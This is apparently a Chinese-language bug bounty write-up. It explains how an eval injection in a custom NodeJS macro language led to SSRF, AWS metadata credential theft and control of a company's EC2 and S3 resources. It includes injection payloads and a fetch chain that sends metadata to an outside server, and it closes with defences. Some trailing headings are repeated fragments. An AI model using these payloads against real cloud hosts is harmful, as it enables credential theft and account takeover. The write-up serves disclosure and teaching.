NodeJS SSRF漏洞利用获取AWS完全控制权限技术分析<\/h1>

漏洞概述<\/h2>
本文详细分析了一个通过NodeJS SSRF(Server-Side Request Forgery)漏洞获取AWS完全控制权限的案例。攻击者利用自定义宏语言Banan++中的eval注入漏洞，结合服务器端NodeJS环境，成功获取了AWS元数据中的临时凭证，进而控制了目标公司的AWS资源(20个S3存储桶和80个EC2实例)。<\/p>

漏洞发现过程<\/h2>

1. 目标分析<\/h3>

目标公司(代号ArticMonkey)使用自定义宏语言Banan++开发Web应用，其中包含一个JavaScript版本(banan++.js)：<\/p>

压缩后2.1M，美化后2.5M<\/li>
56441行代码，2546981个字符<\/li>

包含约135个函数<\/li> <\/ul>

2. 关键漏洞函数<\/h3>

发现危险函数Union()<\/code>，存在eval注入风险：<\/p>

helper<\/span>.prototype<\/span>.Union<\/span> =<\/span> function<\/span>() {
<\/span><\/span>    for<\/span> (var<\/span> _len22<\/span> =<\/span> arguments<\/span>.length<\/span>, args<\/span> =<\/span> Array(_len22<\/span>), _key22<\/span> =<\/span> 0<\/span>; _key22<\/span> <<\/span> _len22<\/span>; _key22<\/span>++<\/span>) 
<\/span><\/span>        args<\/span>[_key22<\/span>] =<\/span> arguments<\/span>[_key22<\/span>];
<\/span><\/span>    var<\/span> value<\/span> =<\/span> args<\/span>.shift<\/span>(), 
<\/span><\/span>        symbol<\/span> =<\/span> args<\/span>.shift<\/span>(), 
<\/span><\/span>        results<\/span> =<\/span> args<\/span>.filter<\/span>(function<\/span>(arg<\/span>) {
<\/span><\/span>            try<\/span> {
<\/span><\/span>                return<\/span> eval(value<\/span> +<\/span> symbol<\/span> +<\/span> arg<\/span>)
<\/span><\/span>            } catch<\/span> (e<\/span>) {
<\/span><\/span>                return<\/span> !<\/span>1<\/span>
<\/span><\/span>            }
<\/span><\/span>        });
<\/span><\/span>    return<\/span> !!<\/span>results<\/span>.length<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>3. 漏洞验证<\/h3>
通过本地测试确认注入点：<\/p>
Union<\/span>('alert()\/\/'<\/span>, '2'<\/span>, '3'<\/span>);
<\/span><\/span>Union<\/span>('1'<\/span>, '2;alert();'<\/span>, '3'<\/span>);
<\/span><\/span>Union<\/span>('1'<\/span>, '2'<\/span>, '3;alert()'<\/span>);
<\/span><\/span><\/code><\/pre>漏洞利用过程<\/h2>
1. 寻找注入点<\/h3>
发现POST请求中的operation<\/code>参数可注入Banan++代码：<\/p>
POST<\/span> \/REDACTED HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> api.REDACTED.com<\/span>
<\/span><\/span>Content-Type:<\/span> application\/json; charset=UTF-8<\/span>
<\/span><\/span>
<\/span><\/span>{"operation"<\/span>: "(Year(CurrentDate()) > 2017)"<\/span>}
<\/span><\/span><\/code><\/pre>2. 注入测试<\/h3>
确认注入限制：<\/p>

无法直接注入JavaScript代码<\/li>
可以注入Banan++函数<\/li>
响应作为true\/false标志<\/li>
<\/ul>
成功注入Union函数：<\/p>
{"operation"<\/span>: "Union('a';'b';'c')"<\/span>}
<\/span><\/span><\/code><\/pre>3. 服务器端代码执行<\/h3>
发现目标使用NodeJS服务器端，使用fetch API进行SSRF攻击：<\/p>
fetch<\/span>('https:\/\/poc.myserver.com'<\/span>)
<\/span><\/span><\/code><\/pre>4. AWS元数据获取<\/h3>
利用SSRF访问AWS元数据接口：<\/p>
fetch<\/span>("http:\/\/169.254.169.254\/latest\/meta-data\/"<\/span>).then<\/span>(res<\/span>=>res<\/span>.text<\/span>()).then<\/span>((r<\/span>)=>fetch<\/span>("https:\/\/poc.myserver.com\/?r="<\/span>+<\/span>r<\/span>));
<\/span><\/span><\/code><\/pre>获取关键IAM凭证：<\/p>
http:\/\/169.254.169.254\/latest\/meta-data\/iam\/security-credentials\/<ROLE>
<\/code><\/pre>
返回结果包含：<\/p>
{
<\/span><\/span>    "Code"<\/span>: "Success"<\/span>,
<\/span><\/span>    "Type"<\/span>: "AWS-HMAC"<\/span>,
<\/span><\/span>    "AccessKeyId"<\/span>: "..."<\/span>,
<\/span><\/span>    "SecretAccessKey"<\/span>: "..."<\/span>,
<\/span><\/span>    "Token"<\/span>: "..."<\/span>,
<\/span><\/span>    "Expiration"<\/span>: "2018-09-06T19:24:38Z"<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>5. AWS凭证利用<\/h3>
设置环境变量使用获取的临时凭证：<\/p>
export AWS_ACCESS_KEY_ID=<\/span>AKIAI44...
<\/span><\/span>export AWS_SECRET_ACCESS_KEY=<\/span>wJalrXUtnFEMI...
<\/span><\/span>export AWS_SESSION_TOKEN=<\/span>AQoDYXdzEJr...
<\/span><\/span><\/code><\/pre>验证身份：<\/p>
aws sts get-caller-identity
<\/span><\/span><\/code><\/pre>漏洞影响<\/h2>
成功获取了目标公司AWS环境的完全控制权限：<\/p>

控制了80个EC2实例<\/li>
访问了20个S3存储桶<\/li>
可获取客户敏感数据、静态文件和服务器日志\/备份<\/li>
<\/ul>
防御措施<\/h2>
1. 代码层面<\/h3>

避免使用eval()<\/code>等危险函数<\/li>
对用户输入进行严格过滤和验证<\/li>
使用参数化查询或安全模板引擎<\/li>
<\/ul>
2. AWS安全配置<\/h3>

限制元数据服务的访问权限<\/li>
使用IMDSv2(需要令牌)<\/li>
为EC2实例配置最小权限原则<\/li>
定期轮换凭证<\/li>
<\/ul>
3. 网络层面<\/h3>

实施网络访问控制<\/li>
监控异常请求模式<\/li>
禁用不必要的实例元数据访问<\/li>
<\/ul>
时间线<\/h2>

06\/09\/2018 12:00 - 开始漏洞挖掘<\/li>
07\/09\/2018 00:30 - 提交漏洞报告<\/li>
07\/09\/2018 19:30 - 漏洞修复并发放奖金<\/li>
<\/ul>
技术要点总结<\/h2>

eval注入<\/strong>：危险函数的不当使用导致代码执行<\/li>
SSRF利用<\/strong>：通过服务器端请求伪造访问内部服务<\/li>
AWS元数据<\/strong>：169.254.169.254提供实例关键信息<\/li>
临时凭证<\/strong>：IAM角色临时凭证的获取与利用<\/li>
环境变量<\/strong>：正确设置AWS_ACCESS_KEY_ID、AWS_SECRET_ACCESS_KEY和AWS_SESSION_TOKEN<\/li>
<\/ol>
学习收获<\/h2>

ReactJS和fetch API的实际应用<\/li>
AWS元数据服务的安全风险<\/li>
从漏洞发现到完整利用的全过程<\/li>
官方文档的重要性<\/li>
渗透测试中的持续尝试和问题解决能力<\/li>
<\/ol>

NodeJS SSRF漏洞利用获取AWS完全控制权限技术分析<\/h1>

漏洞发现过程<\/h2>

漏洞利用过程<\/h2>

防御措施<\/h2>

学习收获<\/h2> ReactJS和fetch API的实际应用<\/li> AWS元数据服务的安全风险<\/li> 从漏洞发现到完整利用的全过程<\/li> 官方文档的重要性<\/li> 渗透测试中的持续尝试和问题解决能力<\/li> <\/ol>

学习收获<\/h2>

ReactJS和fetch API的实际应用<\/li>
AWS元数据服务的安全风险<\/li>
从漏洞发现到完整利用的全过程<\/li>
官方文档的重要性<\/li>
渗透测试中的持续尝试和问题解决能力<\/li> <\/ol>